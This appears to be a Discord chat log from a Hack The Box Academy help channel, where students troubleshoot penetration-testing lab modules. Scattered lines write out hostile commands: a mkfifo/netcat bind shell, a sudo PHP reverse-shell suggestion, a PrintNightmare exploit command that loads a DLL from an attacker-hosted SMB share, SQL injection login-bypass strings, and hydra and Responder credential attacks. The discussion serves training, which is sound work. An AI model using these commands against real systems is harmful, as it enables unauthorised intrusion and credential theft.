but when i try to findout it via nslookup or dig, i just dont get answer
f.e.
dig axfr 10.129.7.13
; <<>> DiG 9.18.28-0ubuntu0.22.04.1-Ubuntu <<>> axfr 10.129.7.13
;; global options: +cmd
; Transfer failed.
Since you're working with DNS, you want to provide what domain/subdomain you're digging
So try dig axfr domain @ip
You don't need to know everything, but it's good to have some knowledge before you start.. But there are modules that cover some basic language in windows and linux, but you still need to be able to navigate and be familiar with some basic syntax there as well .. But sign up at the academy and just get started 🙂
it was mentioned in one of the sections
but whats ip? 1.1.1.1?
You want the IP of the name server you're digging into
.htb is not a global top level domain
You won't find it on 1.1.1.1
it is cloudflare dns
sure although I think the easy one there may just be one way
nah im struggling
1.1.1.1 is dns to cloudflare, like 1.0.0.1/ and 1.1.1.2/3
is there a resources folder attached to the module?
some modules have them some you have to find them in the machines themselves
No, I can't see any. But I just used one of the wordlist from /usr/share/wordlists
unfortunately I don't have that module on my pathway so I can't help
in the attacking common services rdp section and not getting any hits with user list and pass list included. anyone have any recommendations? do i need to mutate the pws.list or maybe rockyou.txt?
have you rdp'd with the creds they already give you?
inlanefreight.com add it to the /etc/hosts file
with the ip of the lab ofc
yes i have but was following down the examples so i learn the most that i can. it says to hydra or crowbar and they both come back with no results
I think they are just examples to show you how it would be in situations you don't have starting creds but have lists to work from you can try running hydra against word lists but you might be running down a rabbit hole
roger. just figured if they supplied a user.list and pass.list that maybe there was an easter egg or something if we went thru all of it
its the same for each sub module in the module so sometimes it is used sometimes it isn't... I could be wrong so might be worth a try but I didn't have to when I went through it earlier
ive been trying so dont waste your time as well lmao
no dramas mate
Guys i have a question about the module "Getting started" in the section "Nibbles-Initial Foothold". I use Metasploit, im setting everything that is necessary and i get this message "this exploit may require manual cleanup of 'image.php' on the target". Does anyone know what's happening?
if you can run php as sudo, just make a reverse shell php script, set up a nc listener and run the php reverse shell as sudo
for example
sudo /usr/bin/php /tmp/reverse-shell.php
Its mainly to see what ports are open, and you can sometimes run some scripts using nmap buts that's just for more enumeration. so its basically for analyzing.
Need help on skills assessment of login brute forcing. I need to brute force the basic http-auth but the wordlists provided in the assessment, when combined, take 38 hours, which is impractical. The problem is I don't know the username, and the section which teaches the basic auth brute force uses the assumed username 'basic-auth-user', which doesn't seem to work here. Any ideas how to go forward? Also the default-credentials list from seclists doesn't work here, used 'ftp-betterpass.txt'
Its nothing super important, but in an actual penetration test or when attacking an active machine, you need to erase your tracks, and the image.php is what had the payload so you could get a reverse shell.
Just run the brute-forcing for 30 minutes, generally they don't make you run through the whole word-list, and the correct creds are not that far in, but I don't know the answer myself.
This has happened because they updated the module. My friend has done this through default credentials.
Before you try to bruteforce something make sure that you identify the service that you're trying to bruteforce and then go from there. The module mentions how to identify a service right?
service is basic-http-auth , when I paste IP in the browser it gives me the username-password dialog box
In the skill assessment they gave you two wordlists, have you used them?
Now again.. I'm at the beginning in the SQLi with sqlmap and the first question is: What's the fastest SQLi type? I type the answer and it says it is wrong, im sure im not wrong.. i tried to type it like ||E-B and even E-b and e-b and it say it is wrong so i did try with e E B and E b / e b|| some times i go crazy how sensitive it is for spelling and case sensitive.. Just saying... not asking for any help
That is the problem when I use those wordlist , they will take approx 38 hrs to finish according the hydra status. So , i tried to bruteforce only password but I don't know the username , I tried some guesses 'basic-auth-user' which is used in the section of the module and other variations such as user, admin
Anyone here who solved the updated module.
thank you 3>
❤️
Anyway solved the problem. Tip: We have to use the wordlists given in the section.
this just in: floor is made out of floor
i see
thanks bro
but how do i continue from there to create an attack?
and how do i make it so people wont be able to scan the ports on my networks
you'd have to set up firewall rules
how do i learn doing so?
but that's irrelevant to this channel
there isnt a module on htb for that?
read and follow #welcome and visit #homelab-sysadm
visit no access fr
first half of the statement you goofball
oh sorry 🥶
following #welcome instructions about linking your HTB account allows you to access the "no-access" channel
alr thanks
Hello, i am stuck in Introduction to Digital Forensics in Memory Forensics
Examine the file "/home/htb-student/MemoryDumps/Win7-2515534d.vmem" with Volatility. Enter the Pid of the process that loaded zlib1.dll as your answer.
do i really need to pslist all PIDs and test them out one by one ? i tried to grep on the dll using dllists and other options but none of them returns a value that can be used to know the PID of the process that loaded the dll
Hey guys anyone can give hints about the enumeration of the mssql, exchange and sccm attacks module? I can't figure out what password is the one you're supposed to find, I tried every possible combination with what they tell us in the enumeration but nothing stands out
You're better off just doing a bash or powershell ping sweep directly from the pivot host, than trying to use proxychains + nmap to scan the internal network
Hey, looking for help - Module: Linux Privilege Escalation - Environment Enumeration. The flag submitted appears to be wrong but it is the only flag found on the system "HTB{S....d}" to show that I have the start and end of the flag. Any assistance?
there's a handful of different flags on the targets
some of the boxes are reused in that module
Okay, thanks....so keep looking 🙂
the methods in the section should lead you to the answer
Tried it but for some strange reason it didnt work, nvm there was no need for priv esc thanks tho for replying
Your first approach|| using dlllist is correct. Just be sure when you grep for zlib1.dll , you have it include enough lines before and after (so you can see which process actually loaded it)||
Good evening guys, how are you? Could someone help me with a question about xss filter bypasses, ADVANCED XSS AND CSRF EXPLORATION?
good evening, can you ask your question?
It would only be in the exfiltration part, I already found the payload that bypasses the filter
awesome!
Can i dm u?
Ah, okay
bro is no help 🤣
🥲

Can someone?
Bro is just curious 😆
If someone can give at least a tip on how to exfiltrate the data, it helps a lot 😊
feel free to DM
I seem to be having an issue with the Attack Enterprise Networks spawn/target - DMZ01 comes up for about 1 minute then becomes unresponsive, is anyone else having an issue?
i didn't have issues when i ran through it; reach out to support if changing vpn regions and respawning doesn't work
(green bubble on the website)
Cheers, I did yesterday but then it seemed to come right, will reach out again
How did you guys like the "Windows Privilege Escalation " module?
have you checked to confirm that your user was actually added to the domain admins group?
Yes I did. I actually found out my issue was that I needed to logoff and restart my computer. My issue was then fixed
Thank for the reply, in the end I did that indeed. I was just curious to understand why I got such results. Could not figure it out sadly.
the pivot host would need to have net.ipv4.ip_forward enabled i believe
which is why even if we just try to do proxychains ping , we never get any ping response back
if we try and ping a host on the internal LAN
I did not check it, but I am confused. I added verbose and packet trace to the request to see what is going on. When scanning one boxe at the time they respond, but if i scan a range then none of them do.
well also, when use proxychains nmap, we typically have to use -sT for a full connect
Oh I see, i should look for it next time. In this case i was going through a vpn so I could get pings back to be fair
so if I had to use proxychains nmap to enumerate an internal lan, i would probably just do something like proxychains nmap -Pn -sT --top-ports 20 172.16.8.0/24 -v
that way we are actually scanning individual ports
but it will do it for every host in the subnet
Also on Pwnbox, I have noticed we have to use sudo when using proxychains nmap
I am using Ligolo, but I will give it a try tomorrow for sure. Thank you for the suggestion
Hello Guys, I started CPTS course 2 months ago, I'm now at Attacking Common Services , DNS part and I'm truly stuck for 5 days. I read the forum but what seems to work with others didn't work with me, so i kindly request the help of someone who passed this .
Thanks in Advance
What exactly is not working?
who pinged
idk
i accidentally got it into my head ages ago that meterpreter is pronounced /'mitərˌpritər/ and now i can't read it any other way
its pronounced meterpreter
i agree
Guys I'm in ad module - llmnr/nbt-ns poisoning from Linux.
How long is responder supposed to take?
It's been running for abt an hour
are you running it from the ssh machine?
Yes
probably selected the wrong interface
use "ip a" and select the one that has 172.x.x.x
Why not the one with 10.x.x.x?
the AD network is on 172
Are all ad networks on 172?
Like is there a way I should have known to use 172?
No, but in the path they usually have AD on a separate network
Yea I got all the hashes
Thank you
So which one of the 90 trillion hashes do I crack
the ones they ask for
They are asking for the use that starts with letter b but I'm literally getting hundreds of hashes from all users
Like they always change and the terminal keeps getting spammed with hashes , I tried cracking a few with hashcat and john but it says no hashes loaded for all of them
the section shows you where the responder logs are saved
can i hack on a phone
thanks
so i can hack on a phone
can i hack to unban my account?
on playstation
So it creates files even if it didn't finish running? I didn't touch it since you told me to change network
And also I'm not finding any in the directories from the module
yes
Password attack lab easy
i found them
responder never finishes
Oh
yes on the ssh machine
I literally can't count the number of all different hashes
Like 3/4 users are all in 2 files and they are all thrown together, fr there are hunders of them and are all different
use grep
Yes but the problem is not finding one hash it's that idk which one I should crack
its gonna look different every time
Bc I tried with a few before shutting responder down and it says the hash isnt recognized
Oh okay lemme try again
did you copy the whole thing?
First I copied the whole thing and tried with hashcat and john then I copied and pasted the commands and showed it to chatgpt and he made the hashes shorter but same thing
did you start from the username all the way to the very end with zeros
dm me the hash
Wait I'm on mobile
Lemme try again
Oh maybe it's working
@safe star Thank you module finished💪
What?
This is a hacking group isn’t it, i need help with something related to lockdown browser but first I don’t wanna breach any rules so is it okey to talk about?
You want to cheat on an exam?
Yea
Bruh
What kind of dumb fucking question is this
😂
Go study
^
You guys must fun at parties lads
😭
Yes
So u dont understand sarcasm also?
W honesty
On the Active Directory Enumeration & Attacks exercise/labs, it says to SSH into the target, which I have done. When we run the commands, are we supposed to use the target (the machine I'm logged into) as the domain controller, or am I missing something obvious?
AD_ENUM Academy module is broken?
^C┌─[htb-student@ea-attack01]─[~/Downloads]
└──╼ $python3 /opt/PKINITtools/gettgtpkinit.py -pfx-base64 $(cat DC01_Cert) -dc-ip 172.16.5.5 inlanefreight.local/ACADEMY-EA-DC01$ dc01.ccache
2024-11-19 20:23:17,378 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-19 20:23:17,480 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"
It looks like the KDC does not support authenticating with a certificate.
wym? the ssh target has another network interface to attack the AD domain
That's good to know, but I still don't know what the DC is for INLANEFREIGHT.LOCAL. Is it static throughout the exercises? Are we already supposed to have this information documented somewhere?
yeah its static, you can check the /etc/hosts file
better to say what module/section and question you're on. you just posted some random error with PKINIT which i don't see when searching the ad enum and attack module.
Nothing in there that looks like a DC:
$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 debian12-parrot
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-2x1ratdvaf htb-2x1ratdvaf.htb-cloud.com
is that the ssh machine?
Not possible to tell if you don't include the section. There are multiple different environments in that module. Generally you can easily guess the dc by just pinging dc01, dc02, dc03, etc
Dang, you're right. That wasn't the right machine. I went to eat dinner and got disconnected. I think the DC IP in the /etc/hosts file solves my issue.
Thank you for your help.
There is a section after Attacking FTP about latest vulnerabilities I believe. Give that a look.
Anyone willing to teach a newb. I want to start earning but I need some help with where to start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi, if anyone can help with the debugging section of the malware analysis part. Inetsim is working, i have made all the changes yet i still get the sandbox message, even after being patched into a new exe.
would appreciate any guidance
have looked at the forums but there isnt much help there....
extremely confused as to what to do atp, tried a lot of fixes but none of them seem to work? Just wondering if its the module atp as a lot of people have had a similar problem but no one outlines a fix.
I have searched and even wrote a python script to search all txt files for the possibly other flags and found nothing. I did so as root. Still nothing more than one flag under the root folder which is not the correct answer. Any other hints?
Hello guys. I"m currently working on the subverting query logic section of the SQL injection module on the CPTS path. I'm getting successful logins under the username "admin", but am having trouble getting one under "tom" (for the question). Even when using tom as the username and using "hat' OR '1'='1"
As the password without the quotes, it keeps saying I have a successful login under the "admin" username. Any tips for me?
So I jumped forward to the next section, and was able to use a comment injection to get it... However the previous section didn't cover comment injections, so I'm still curious how this section was intending for me to use a SQL injection.
It is Bleeding Edge Vulnerabilities and PetitPotam section.
I searched this kind of errors in this forum. Many people have been faced with this error. It might look like Cert error or AD setting error.
I would recommend sticking to the commands provided in the section instead of going crazy with a python script etc. Find a way to escalate your privs then search and investigate hidden files with your elevated privs. You can do this all without root.
Okay, I got root, but I will review the list of commands provided in the section again.
are you sure you're connected to the right box? i don't think root is the intended path, although you should be able to get the flag if you have root as well.
100%, I have used use the click copy for the IP address, and ssh'd into the box as htb-student
Hello everyone I was trying to make payment for CPTS exam but payment keeps being rejected and the support I’m getting is not so good. HTB accepts only credit card payment? No PayPal or debit card choice?
hi guys. just a quick query. what im looking at in the module and what im looking at in the vm are showing two different things?
why is this when i have replicated the steps the same
depends on the module, but not all of them are simply copy/paste follow along. it teaches you the concepts, then you must apply the concepts in a challenge to find the flag.
i understand that, the module asks us to simply recreate the steps and yet it doesnt work?
this is for the debugging section in intro to malware analysis btw
"Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces."
well i haven't done that module so i can't help much
reach out to support on the website, no one here can help with that
i didn't get that error when i did it, but it's been a while something could have broke. are you sure you got the right data for the cert?
Thanks you SuperNuts, your response to simply go back use the commands in the section worked, I got the flag.
i cannot pronounce it properly in my head
has anyone here actually done the malware analysis module...
just interpreter but meterpreter
yes for sure. because I got this base64 encoded cert from relay. and error message is AD does not support smart card logon.
It is not the cert problem. I think this machine is broken now.
and I am for sure. windows machine also does not work with rubeus as well.
I just tried the module and got the same error you got
i don't see anything in my notes about this, could be the box is broken right now or i'm just forgetting something
you may want to post in #1234357888114364508
got it. thanks
i know that's how it's pronounced
that's why i said "i accidentally got it into my head ages ago that meterpreter is pronounced /'mitərˌpritər/ and now i can't read it any other way"
but interpreter
but meter preter
https://academy.hackthebox.com/module/103/section/973
XSS module, reflected XSS section. They mention that in order to weaponize reflected XSS, if the vulnerable parameter is part of a get request you can simply make the request then copy it from firefox network tab. But they do not show you how to weaponize it when the parameter vulnerable to XSS is not part of a GET request. In this case copying the link does not help, as the request is part of the body. Anyone knows how to weaponize it in this case? Or is this something they cover in the advanced XSS module?
You can use other verbs with things like curl or web proxy
yeah, but in that case what you copy as curl and coerce the user into running the curl command ?
the link you want to use..
but the parameter is not part of the link when it's a post request....
the browser sends the verb with the link
why would their browser post or something though
usually browsers do get requests, there are others that get the page too
but its not going to send a post request without it uploading or something
I am not sure I follow you here, for me when the request is post, the browser does not include the parameter
maybe i'm not understanding if you're asking how to weaponize it or send the payload to the victim, but i thought you asked how to weaponize it. it's the same as the get request
how is it the same as the get request as parameter is no longer part of the URL ?
i don't know what you're asking. for this section specifically, you can see they're having you paste the link into your browser and visit it
so you can make the same request, aka weaponize it, using different verbs other than "get" with curl or something like burpsuite/zap
That's the entire point they only ever show you how to weaponize vulnerable GET parameters
if you're just visiting the page in firefox it's not going to perform a HEAD verb or something automatically
the weaponization of the exploit happens from you not the target browser, the browser is just the vehicle for you to send the target to your payload
if it's a POST request it's not gonna be in the URL so not much you can do there
you could do CSRF but that's not XSS
Much appreciated, thanks for the info 🙂
hey guys, having trouble with this question, *Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.* in the Network Services section in the Password attacks module, I used hydra -L username.list -P password.list rdp://10.129.56.244, however unlike the other techniques taught I get no prompt as to which password works, has anyone else had this issue
I didn't have that issue
did you use any extra filters or anything? I've reset the box twice but [3389][rdp] account on 10.129.227.69 might be valid but account not active for remote desktop: login: john password: miguel, continuing attacking the account. is all I get for the whole wordlist
no exact same as you
is the target still up? maybe reboot the vm or something or try pwnbox
I've tried pwnbox and rebooted the target like 4 times
Whitebox attacks - advanced exploitation
Can anybody tell me where the flag is? Literally cant find it lol, checked databases etc
hi
Ask your question and don't ask to ask 🙂
I tried everything but it didn't work
I got answers 26, 87 but they are wrong answer
@storm elk
Please, when asking a question, don't forget to mention the module and section you're stuck in (the names, not a link or just writing the numbers)
Can anyone help me with this module for WSUS? Why do I still get an error when I follow the guide: https://academy.hackthebox.com/module/263/section/3095
Hello my name is Fred. I am new to the world of hacking. I need someone to hold my hands and help me since i am self learning. I am in Kenya Africa where resources are hard to acquire but i have been putting in the work and my efforts has led me here . Help me
I am sure that I have done everything correctly, whether I am doing it myself or following the instructions in the chapter, but it always prompts "Access deny" at the last step
Hello Fred. Welcome. I'd follow the getting started if I were you (link below) but nobody is going to hold your hand unfortunately.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@storm elk sorry
If you want to learn more - follow the fundamentals modules on Academy and see what you like. Follow a path
anyone else do password attacks and attacking common services at the same time just because password cracking takes so long?
Has anyone given the eJPTv2 exam
Module: Shells & Payloads , Section: PHP Web Shells
Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
I followed the exact steps as mentioned in the module, also tried with the built-in browser in burp, but when I try accessing the /images/vendor/test.php it gives a 404 error
What can i do?
I used the wwwolf php web shell as per the module
I used metasploit with linux/http/rconfig_vendors_auth_file_upload_rce module which was discussed before in the same module, that worked. But why is the intended method not working??
someone who has Sightless root flag?
IF you don't have access, please, follow instructions in #welcome
Can you access the modules that you've finished after your subscription has expired ?
yes
Hey guys ^^ i need help / someone to confirm something for me (Sorry for the huge textblob)
In the AEN Module at the Information Gathering stage after setting up Dynamic Port forwarding the module recommends to check the port forwarding with proxychains + nmap (it should return open ports, but it only returns filtered Ports)
I also tried the meterpreter section of the Tunneling and Port forwarding module, which also only returned filtered ports.
So my question is now: Is the proxychains package broken? Or is it just normal to return only filtered ports due to some update? (It worked around 6 months prior to today.)
Can someone try to check if it works for them.
What I already tried:
Restarting the target
Resetting the target
Restarting the VPN
Switching the VPN
Switching to pwnbox
Switching pwnbox and VPN to multiple different locations / servers
1 for 1 copying the provided answers from the HackTheBox team which come with my subscription.
netstat confirms that the port is forwarded correctly.
using proxychains to copy a file via SSH worked.
Yes it was a -sT nmap scan
@feral charm
has there been any word on upcoming content on ICS / OT ? The Alchemy pro lab makes me hopeful
The Practice Lab on the Documentation & Reporting module is a lot of work
Anyone know how to resolve this
Yes
What’s the domain you were given?
smbclient -N -L \\10.129.99.41\ you’re gonna wanna do this command
Or to specify a user
Use -U
Don’t forget the slashes otherwise smbclient won’t know what you’re talking about
do_connect: Connection to 10.129.99.41htb-student failed (Error NT_STATUS_UNSUCCESSFUL)
I meant -U
Can you copy paste the exact command i can't get it right 😆
So the command should look like
smbclient -L //10.129.99.41 -U htb-student
do_connect: Connection to 10.129.99.41 failed (Error NT_STATUS_IO_TIMEOUT)
Dont think it likes me
@modest basalt please don't just post random CTF in channels.
sorry
Hi guys
on the web requests module, for the last question on the crud api's I accidentally deleted the flag from the server/api
✅ Solution for the issue Dear Academy members, For anybody still having the NT_STATUS_IO_TIMEOUT issue in the Windows Fundamentals Module, the reason causing your inability to ping/interact with the machine (besides port 3389) is the Windows Defender Firewall. In order to fix the issue, you must open the Windows Defender Firewall settings in...
First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.
I accidentally deleted the flag and now it doesn't give me the flag, what should I do? I can't reset the IP as well
the command I ran
ok nvm I was able to reset it ( for some reason the reset button is there but hidden)
Bumping this issue.
Hmm, I haven't done both of them, pretty sure from what I have seen Password Attacks does take much longer time.
What's the error you getting?
I can just see smbmap detecting host.
yeah i started doing cbbh as well as password attacks, Im hoping the rest of the modules in cpts arent as long as password attacks
AD Enum & Attacks is.
It just connects and then disconnects.
looks like its checking for open ports
I'll fire up a target host and grab a screenshot, brb.
awesome
@naive sage @lusty thicket Nvm, it's working. It's just that it didn't permit NULL sessions and I wasn't authenticating. I thought something was wrong since I don't recall the tool being that verbose 

awesome stuff man!
ahh ok
Hi everyone sorry for bothering in this channel, im doing the certified box and i need some hints, anyone had done the box that can help?
Hello guys, Im stuck in the public exploits module, someone that did it can help me?
you beat me to that one. 
State the section and your question and people might answer.
thanks ill check it out
it's the "Getting Started" module
And section? Or is the section public exploits?
maybe you didnt get it well 😄 You need to for example RENAME city1 to "flag". Then try to delete ANY CITY EXCEPT FLAG ! 😄 (for example delete city2) and then search for "flag" city 😄 Because what you did is, that you deleted flag 😄
"Public Exploits"
Okay 🙂
a rat and his friends crawling around your phone? is this real?
we cant help you buddy
Unfortunately, it's true, but these are virtual rats who constantly control my phone, wifi, mobile internet, apps, VPN and basically everything. I thought you guys were smart, I wasn't, so with your help and continuous data input, we could play a live catch and reveal his real identity.
we can't help you
if you have malware on your phone, reinstall it or clean it up with virus scanners
Unfortunately, it's been shot out of it, there's a lot I can do to restore it.
sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'
sudo smbserver.py -smb2support CompData /backupscript.dll -->Module Active Directory Enumeration & Attacks
it authenticates successfully but does not send the stage in msf console
Anyone mind helping with an explanation that is unclear for:
https://academy.hackthebox.com/module/237/section/2612
Rapid Triage Analysis...
the first demo is a time stomp identification but it doesnt clearly outline how to determine exactly how you identify which entry was changed
chat gpt gives both an answer and the opposing answer as... answers
i have what i believe to be an answer... that $FILE_NAME is kernel level and cannot be modified, and that $STANDARD_INFO (is not? and can be modified?) but what about root kits?
yeah i got that i accidentally deleted "flag" instead of the city lol, but its fine i ended up reseting the lab
Probably, the root rat rooted the whole phone. I know that it needs Google DNS, and to be able to pump something to it: denied does not allow it. It must be rooted, but as I said, I tried to read it, but the internet immediately stops when I try something. The discord server has also been blocked, along with the permissions and notifications.
There is no obstacle for me to someone logging in remotely, I give them data, email address, etc. that they need and they look at it. I have nothing to hide. I have no bank details on my phone, nothing extra. My job search is constantly blocked, for example I don't have Facebook, I tried to register, but the system didn't allow me to do that either. My emails are filtered, I don't get everything, and the SIM card also works strangely.
Shells and Payload, Bind Shells
“SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.”
When binding a shell to tcp session why does it do nothing? It just stays empty after I do the command
htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | sudo nc -l 10.129.228.129 8080 /tmp/f
on Pivoting, Tunneling, and Port Forwarding and im supposed to use proxychains to move on to the next target but it will not let me install proxychains. anyone else had this issue?
I don't have a computer, and I'm a complete idiot when it comes to programming, I've never studied, I'm not young anymore, for me it's like I have to start general isolation now, and I also have to learn a language. I have no idea what I need where, what program I need. And I only have a crappy Android phone. Unfortunately, this is the truth.
nevermind im an idiot
How can i use wireshark to find a new user being made within a host
Could I get a hint for Whitebox attacks Type Juggling Authentication Bypass?
same
is it normal for case#6 in sql essentials - Attack Tuning, to take a long time to inject with time-based blind injection? I know time-blind can take time but this is ...
even when lower the --level and --risk
It depends on your net connectivity. Mine took some time but no more than an hour to get the flag. But you could use search queries and such to optimize it.
thanx
if it did take one h then i know it is no problem with it..
Did the same mistake when running machines once and waited for two hours 😄
ah, now it is retrieving, and it takes time too :D
How do i read this to figure out the name of the user attempting an action
just hope the target time is enough, just have 10min before i have to restart
looks like bob hardworker is the user
might be wrong tho
sadly not it
the uname is just bob no?
data; name="uname" bob?
form-data means it comes from an html form (so like a website that has you type in your user and password in separate fields). name="uname" means the identifier of the field is "uname" (probably for username) and the content follows after: bob
Further down you see another form-data field with the name="psw", probably for password. The text after is then the password
Its not bob.
which module/section is this?
I think you are looking at the wrong part in the pcap file
Im still sifting for packets not even in a saved pcap
#cdsa we cannot use ssdeep -pb * command at the same time in Static Analysis On Linux , i use only ssdeep -p *. Has anyone faced this
hi everyone,
is age important for exams?
What do you mean
if i am 15, can i take exam?
Im doing the skill assesment of the shells & payloads module , there is no browser in the foothold machine
type firefox in the terminal
Anyone done the challenge for this module?
https://academy.hackthebox.com/module/184/section/1946
Im stuck on the challenge. Its for HTTP and TLS attacks
did you manage to solve this?
or you?
WEB01 (and academy target machines in general) do not have internet access
Bump 🙂
You need to ||pad it to correct number of bytes, but the last byte needs to be how many bytes were 00. The hint tells you how many bytes it should be. Each pair is a byte, i.e. 00, or AA are bytes||
isnt this correct then? ||AABBCCDDEEFF00000003||
No. That's only 10 bytes. Check the hint.
got it
thanks, was counting wrong lol
You need to ||type juggle the password in the payload via burp suite or some other interceptor. Good way is to try all of the comparison types||.
hey y'all
I'm doing skills assessment on the information gathering - web edition module, and I get 0 results for additional vhosts on the target. I tried gobuster on my local kali vm as well as on the pwnbox, triple-checked my hosts file and other configs.
also, crawling on the initial vhost gives no interesting results, robots.txt returns a 404 message, etc. Is it possible that something's off with the target? or am I missing something?
Issue on the modules for get web modules
have you tried different wordlists?
https://academy.hackthebox.com/module/163/section/1546 the nmap he is running on the pivot host is i guess a static binary?
Can you help me about Graphql skills assessment?
hey i’m very new to htb and im currently working on the basic tools module. ran into an issue with netcat not working and given the error : ip forward host lookup failed
any help would be appreciated
Hi. I am working on the crackmapexec module - MSSQL section. Can someone please explain to me why I can read the content of a file, but downloading it does not work? The file I get is empty.
Did you Google that error?
#1 lesson when learning this, is learn how to research
yes however everything that i was told to do i did and did not work
what did you Google, what did you find
When using gobuster vhost to find a ".htb" domain, specify the ip address:port in the --url option, not the domain name, or it will try to look up the domain using DNS; then specify the xxx.htb domain using the --domain option, as well as --append-domain. You may need a subdomain wordlist that has over 100K words. Using 100 threads will help it go faster.
the error code and module step i am on
show me the link of the page, what did you find?
The very 1st Google result probably has your answer. Check that out.
compare the path you've specified and the one from the output of netexec
is the same
isn't?
check again
Hey, strange question, can someone here hack into an Instagram account?
dns resolution issues, firewall or network problem or incorrect host name
no, and this is not for that
i can single out dns fairewall and network problem as the machine is setup by htb
firewall*
link?
that is NOT a link
that is ChatGPT
I used single quotes this time, same problem:
in cbbh exam can i use sqlmap?
There’s no tool restrictions
Refresh the page & wait a moment more. After that you can try switching regions and respawn (don't forget to redownload the VPN file).
but how do i stop it from spawning
I changed vpns
Refresh again? Hard refresh with Ctrl+Shift+R? I think changing regions usually stopped it from trying to spawn, but after I found a region that worked well it hasn't happened much since, so I don't have any better suggestions.
Try spawning another machine
module cracking hashes with hashcat - section: Cracking Common Hashes - the question at the end I have identified the hash and ran it with the -g 1000 but it keeps exhausting it I know I have the right hashcat syntax but it doesn't work, how would I troubleshoot this?
I have all my working out in my notes if I can post here or DM someone, I am a bit confused why it isn't working
if it exhausts it means the password was not in the password list
haven't done that module, does it tell you which list to use?
yes, I followed everything it got to the point it exhausted the rockyou.txt wordlist which is what it suggests to use and I even found a crib sheet online and done the identical command and nothing
and it shows 0/1 recovered right? if hashcat has cracked the hash before you need to use --show to show it again
it hadn't cracked it before I dont think I can try running it again
I've been stuck on the SQLMap Essentials module for like a month trying to get the contents of table flag3. I've been trying to use burpsuite and sqlmap to find the right injection to pull the table but sqlmap just says that the URL content isn't stable but the id parameter (as well as every other tested parameter) isn't injectable. Closest I've gotten is altering the cookie contents to change the output so that every ID is returned. My only guess is that the php uses the number in the cookie ID as a variable to pull the ID column in question 🤷
I even ran it back through hashes.com and it confirms the type of hash I used in hashcat was correct, really confused.. I will keep an eye on here but I am in GMT time
You can DM what you are trying.
i continue having issues with the crackmapexec module
now on the kerberos section
why I am not able to use || grace || on this one? it is a valid domain account and the one that is provided.
Ok, resetting the box
Again
is your /etc/hosts set up correctly? Thats pretty important for kerberos and ldap
Yep
cause it does complain about you trying to connect to 172.16.130.3
which looks like an internal ip
Hello guys, i have the same problem as this guy in SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe) (SOC Analyst Certificate) and i can't find a solution for the problem, i tried all the dates. Can someone please help me ? Thanks a lot
try specifying the full path for the destination file
Thank you, I will go back and check. I moved on to the kerberos section, and having issues too
this is super weird... I am about to generate another VPN file
That’s not enough, specify “dc01 inlanefreight dc01.inlanefreight.local inlanefreight.local
ok, let me try
yep, we need to have inlanefreight.htb resolve to the IP address too 😉
Some other OSError occured: [Errno Connection error (INLANEFREIGHT.HTB:88)] [Errno -2] Name or service not known
Thank you @tranquil axle and @west canopy
Maybe is time for dinner 😂
I love nxc by the way! So powerful
ya it can do pretty much everything
I'll check this one later tonight! Thanks
Hey @gray yacht thx for replying. I am indeed setting the port. I tried with given port from target creation and standard port 22 which shows as open with nmap.
You can DM what you are getting on your end. I just redid this one since it was updated.
Anyone here in the military?
I wanted to talk with a recruiter but I'm not in the us and they keep shutting me down
Can I tell them I am
I'll give it a shot, thanks for replying
?
in windows priv esc citrix breakout, the citrix env is not reachable for our attack host, how did they connect the smb server to it?
Anyone able to help with the section in the SQL injection section "Using Comments"?
The question is to login with the user with the id 5 to get the flag.
I'm trying with multiple variations of the following as the username: x' or where id=5);
I
impacket-smbserver 😉
I've also inputted passwords such as: something' #
In conjunction with usernames similar to the above
also important, we have to be the root user
||
```
htb-student@ubuntu:~$ cd Tools/
htb-student@ubuntu:~/Tools$ sudo su
[sudo] password for htb-student:
root@ubuntu:/home/htb-student/Tools# smbserver.py -smb2support share $(pwd)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
||
they are in different subnets..
not reachable
I saw something in the module saying that the "--" can also be used to select usernames from the table, but I'm not seeing the syntax for it? Maybe I'm misunderstanding something?
I'll step back now and await a response if someone is able to get around to it :).
you might be misunderstanding
from the citrix environment MS-Paint/File Explorer prompt
it can reach out to 10.13
nope
In the active directory enumeration and attacks module, Credentialed Enumeration - from Windows is anyone able to connect to the attack machine? I've reset the attack machine 5 times now but it keeps timing out with this error. Just wanting to know if it's just me, or an HTB issue.
/p:[password]
password
Even with /p:Academy_student_AD! it throws the same error
can i DM u the problem?
sure
try putting the password inside of single quotes
Test
No luck with that either
Did you just spawn it!?
Cause it takes a bit of time to load the service
